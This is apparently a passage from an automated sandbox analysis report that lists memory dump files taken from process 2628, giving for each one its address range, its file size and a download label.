memory/2628-41-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2628-40-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2628-26-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2628-78-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

Filesize
9.6MB

Download
memory/2628-24-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2628-25-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2628-23-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/2628-22-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download